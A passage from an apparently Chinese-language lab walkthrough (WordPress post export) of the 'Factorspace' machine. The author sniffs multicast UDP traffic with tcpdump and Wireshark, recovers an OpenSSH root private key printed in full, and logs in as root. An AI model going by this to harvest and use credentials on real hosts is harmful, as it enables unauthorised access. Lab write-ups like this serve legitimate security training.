udp\n11:46:51.813020 IP kali.43047 &gt; 192.168.0.1.domain: 30852+ PTR? 1.1.1.224.in-addr.arpa. (40)\n11:46:52.169564 IP 192.168.0.1.domain &gt; kali.43047: 30852 NXDomain* 0\/1\/0 (97)\n11:46:52.169757 IP kali.37799 &gt; 192.168.0.1.domain: 4090+ PTR? 101.0.168.192.in-addr.arpa. (44)\n11:46:52.177404 IP 192.168.0.1.domain &gt; kali.37799: 4090* 1\/0\/0 PTR factorspace. (69)\n11:46:52.177744 IP kali.41998 &gt; 192.168.0.1.domain: 60027+ PTR? 1.0.168.192.in-addr.arpa. (42)\n11:46:52.207927 IP 192.168.0.1.domain &gt; kali.41998: 60027 NXDomain* 0\/1\/0 (97)\n11:46:52.208141 IP kali.59483 &gt; 192.168.0.1.domain: 7399+ PTR? 143.0.168.192.in-addr.arpa. (44)\n11:46:52.212413 IP 192.168.0.1.domain &gt; kali.59483: 7399* 1\/0\/0 PTR kali. (62)\n11:46:53.759177 IP factorspace.rplay &gt; 224.1.1.1.rplay: UDP, length 2601\n11:46:53.759177 IP factorspace &gt; 224.1.1.1: udp\n11:46:54.689892 IP QC-20210627LTVJ.58647 &gt; 192.168.0.1.domain: 30733+ A? sgp-01-16A0E.pigsmightfly.pro. (47)\n11:46:54.727900 IP 192.168.0.1.domain &gt; QC-20210627LTVJ.58647: 30733 4\/6\/10 CNAME gtm-sg-dza3gmqkq03.pigscanfly.pro., A 120.232.198.240, A 125.88.148.71, A 125.88.148.72 (512)\n11:46:54.757934 IP kali.55213 &gt; 192.168.0.1.domain: 39232+ PTR? 152.0.168.192.in-addr.arpa. (44)\n11:46:54.767302 IP 192.168.0.1.domain &gt; kali.55213: 39232* 1\/0\/0 PTR QC-20210627LTVJ. (73)\n11:46:55.760827 IP factorspace.rplay &gt; 224.1.1.1.rplay: UDP, length 2601\n11:46:55.760827 IP factorspace &gt; 224.1.1.1: udp\n11:46:57.763210 IP factorspace.rplay &gt; 224.1.1.1.rplay: UDP, length 2601\n11:46:57.770028 IP factorspace &gt; 224.1.1.1: udp\n11:46:59.765756 IP factorspace.rplay &gt; 224.1.1.1.rplay: UDP, length 2601\n11:46:59.765757 IP factorspace &gt; 224.1.1.1: udp\n^C\n22 packets captured\n22 packets received by filter\n0 packets dropped by kernel<\/code><\/pre>\n<p>\u53d1\u73b0\u786e\u5b9e\u5728\u53d1\u9001\u6d88\u606f\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/factorspace]\n\u2514\u2500$ sudo tcpdump -i eth1 udp and dst 224.1.1.1 and port 5555 -vvv\ntcpdump: listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes\n11:56:30.276525 IP (tos 0x0, ttl 1, id 5436, offset 0, flags [+], proto UDP (17), length 1500)\n    factorspace.rplay &gt; 224.1.1.1.rplay: UDP, length 2601\n11:56:32.277076 IP (tos 0x0, ttl 1, id 5822, offset 0, flags [+], proto UDP (17), length 1500)\n    factorspace.rplay &gt; 224.1.1.1.rplay: UDP, length 2601\n11:56:34.278655 IP (tos 0x0, ttl 1, id 5965, offset 0, flags [+], proto UDP (17), length 1500)\n    factorspace.rplay &gt; 224.1.1.1.rplay: UDP, length 2601\n11:56:36.280565 IP (tos 0x0, ttl 1, id 6255, offset 0, flags [+], proto UDP (17), length 1500)\n    factorspace.rplay &gt; 224.1.1.1.rplay: UDP, length 2601\n^C\n4 packets captured\n4 packets received by filter\n0 packets dropped by kernel<\/code><\/pre>\n<p>\u9614\u4ee5\uff0c\u4f7f\u7528wireshark\u8fdb\u884c\u67e5\u770b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300011556.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300011556.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430000053564\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u79c1\u94a5\uff01\uff01\uff01\uff01\u8fdb\u884c\u4fdd\u5b58\uff0c\u4f46\u662f\u590d\u5236\u4e0d\u4e0b\u6765\uff0c\u8fdb\u884c\u8f6c\u6362\u7136\u540e\u8f6c\u56de\u6765\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300011408.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300011408.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430000252089\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300011848.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300011848.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430000318091\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u4e0b\u79c1\u94a5\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAt7C5Q3oTUF0g\/0E0ml7PSWDmXh9aQDI6ph2oH1JmYXooVk0ACYBk\nnqhM\/GBDGmPibjbF7caE+Hgj9FhaE8eCgDznlBXtPouIqaWsN3RHkKZT0qV62G2CRpEHD0\nKFY9H4OnkhuHIDIWhioVvbz1kKVG1w\/Ys\/KPIcLeTzYpsPyeOD9U62IcOuZ5V4Zk7scjnU\njv9uu22JoY9\/qg6fIaB63IwJE097udtYc3WCR1RwMP3ePST7MKLm7ZcYyRsGm8iyMhuoDq\nIrCLHdMouMDiJaB1jse9SAOZwjyIBQb\/NBReydO8RK0JWw6UvGiIH8jlpnpjt6LSKeYKCy\nJciSQeBtl7JgI\/xO1e\/wO5tygA991PD3G1u0\/POeXgHsYNbSLq1IgzloS99J8lanEdTALR\nKY\/ZWnYDN6zvW6MGR+5MgX1gFGeKMqv01ho\/RYeKG6QvSk5di0o27jdvbsWVE6nZeaYO4V\nt3obvpgZsynzoRb5vWJl3q\/Zy\/ymzlnPYYSD3wgNAAAFiJQFmimUBZopAAAAB3NzaC1yc2\nEAAAGBALewuUN6E1BdIP9BNJpez0lg5l4fWkAyOqYdqB9SZmF6KFZNAAmAZJ6oTPxgQxpj\n4m42xe3GhPh4I\/RYWhPHgoA855QV7T6LiKmlrDd0R5CmU9KlethtgkaRBw9ChWPR+Dp5Ib\nhyAyFoYqFb289ZClRtcP2LPyjyHC3k82KbD8njg\/VOtiHDrmeVeGZO7HI51I7\/brttiaGP\nf6oOnyGgetyMCRNPe7nbWHN1gkdUcDD93j0k+zCi5u2XGMkbBpvIsjIbqA6iKwix3TKLjA\n4iWgdY7HvUgDmcI8iAUG\/zQUXsnTvEStCVsOlLxoiB\/I5aZ6Y7ei0inmCgsiXIkkHgbZey\nYCP8TtXv8DubcoAPfdTw9xtbtPzznl4B7GDW0i6tSIM5aEvfSfJWpxHUwC0SmP2Vp2Azes\n71ujBkfuTIF9YBRnijKr9NYaP0WHihukL0pOXYtKNu43b27FlROp2XmmDuFbd6G76YGbMp\n86EW+b1iZd6v2cv8ps5Zz2GEg98IDQAAAAMBAAEAAAGAB64H0N5luFJscr+TJ3EXUYYPm5\nfL+isfcJqE0OptBV5KGXGWss7\/ZfK7ZUHRDGVorhr0I4DNRmYferPG8FTDDAF\/3R0dkiPb\nTtxyWs8tvsp1brUkcbACZljh5q1tTkMVEbzGwCNkJh1rIjvo8L5URDtfIfqUZW3Z58FOu6\nyn+FTey37C9p5ryEDji8N49z2buW7MfmGSA4MwXzfFR26iNF5Wcsw77AVTqWAcVkcdea7j\nf8LwDZSB+yT6EE5k9FZrqqrokMJ3sarLFbSreicFaZdprCVdq0v7bqW8\/nL11rcP1aJYig\nfrWvV2Ws9c6PRDdrxDPvK6O2syv0jTnwe3MZZfY\/quuH5QefzNZJ6b\/hcU2DOjDhE17nQQ\n78dI7pcKyg\/3eZwjmqTgSuvbSzcJhx+6EkC8tB4EG+VLBSQvGxUzQsDKQ5WPajnc8wk95a\n45mLZwacsXUep8CqCy+oIuzFhZmOpXJKc5YYKKIaXluJ9\/Cawr6SWGGPPe8yve0G6xAAAA\nwQCrWWMwu\/elmBWoru6oLs4HBgDemGwuQIwoJrloWqNv6NKflOfl4H9MFtL3upMZhWVvxh\n5X13gyb0kFUYDl0hMOn+u6jSyCaiHBVY0T4koViJ3HRZE7Txgz4YNKew5fduad7u18FFjr\n7ZzuEx5l4tTPZ0\/pDLQUdborkLGDAe\/sVTczBBGQpLx1ibNqm4lD3xAl+1BuEGTm7o9yoE\n79wKsBQsfbJWE4XNR+LJOoRbE5U6D01bQ7eJCWIwRfOB6MqOoAAADBAOXAhvv9mQSyKL8Q\nDCW585HXY90Dd9ShP6XgGJ93+HjNCREn0fECRuaVfdTNf1ZpDqBLedXyMglY9sEQGPddSE\n\/ZKfhYvZl77fhC3+DgAjIUC3o0ENZYBmz5pEcXN\/mzRps0vuRC4CexOkz4R5y\/rHv3+37u\nbG3VgvaqM7TcpQ\/ytJQ6gzSZZoRMvHIlfXguTloL0wJiuvhFHhPjftw68vMqC4iXPeV+59\nWDxS84DetVPnB6eeCkj7nNwbH\/WYH9owAAAMEAzK0LzTiFq5Fi7tV0zmM1cbEQslcHlciO\nrknr7mI308Qm+XMo3IsQDFo5ukWFCX3UEkvAgfueOCCpmLU2aHjY62SEzmNok867me4eoo\nx7kiHI8LZ5A3P6orzYvunEQy4zIm9nG8gGfrxSQOxVhUSnKmvayLcjmg0iffzq6bv2ZHyZ\nXvwuDAcKd1wxzdk1C2rX9BDLLxvAIde+GOLup9cc6kuFBQj7F6miqVXdVFgQ9RFL8jTaYI\n8ZF1pbgmjzZd6PAAAAEHJvb3RAZmFjdG9yc3BhY2UBAg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>\u53ea\u6709root\u8d26\u6237\u4e86\uff0c\u5c1d\u8bd5\u5207\u6362\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/factorspace]\n\u2514\u2500$ chmod 600 root                 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/factorspace]\n\u2514\u2500$ ssh root@192.168.0.101 -i root\nLinux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon May  8 16:29:25 2023\nroot@factorspace:~# ls -la\ntotal 28\ndrwx------  4 root root 4096 May  8  2023 .\ndrwxr-xr-x 18 root root 4096 Feb  6  2023 ..\nlrwxrwxrwx  1 root root    9 Apr  6  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  572 Apr 14  2023 .bashrc\ndrwxr-xr-x  3 root root 4096 Apr 14  2023 .local\n-rw-r--r--  1 root root  161 Apr 14  2023 .profile\n-rwx------  1 root root   33 Apr 14  2023 root.txt\ndrwx------  2 root root 4096 Apr 14  2023 .ssh<\/code><\/pre>\n<p>\u62ff\u4e0brootshell\uff01\uff01\uff01\uff01<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1cD421j7MM\/\">https:\/\/www.bilibili.com\/video\/BV1cD421j7MM\/<\/a><\/p>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=pY4pbQ0mC4w\">https:\/\/www.youtube.com\/watch?v=pY4pbQ0mC4w<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/qq_34942239\/article\/details\/137158217\">https:\/\/blog.csdn.net\/qq_34942239\/article\/details\/137158217<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Factorspace \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/factorspac [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-662","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/662","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=662"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/662\/revisions"}],"predecessor-version":[{"id":663,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/662\/revisions\/663"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=662"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=662"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=662"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}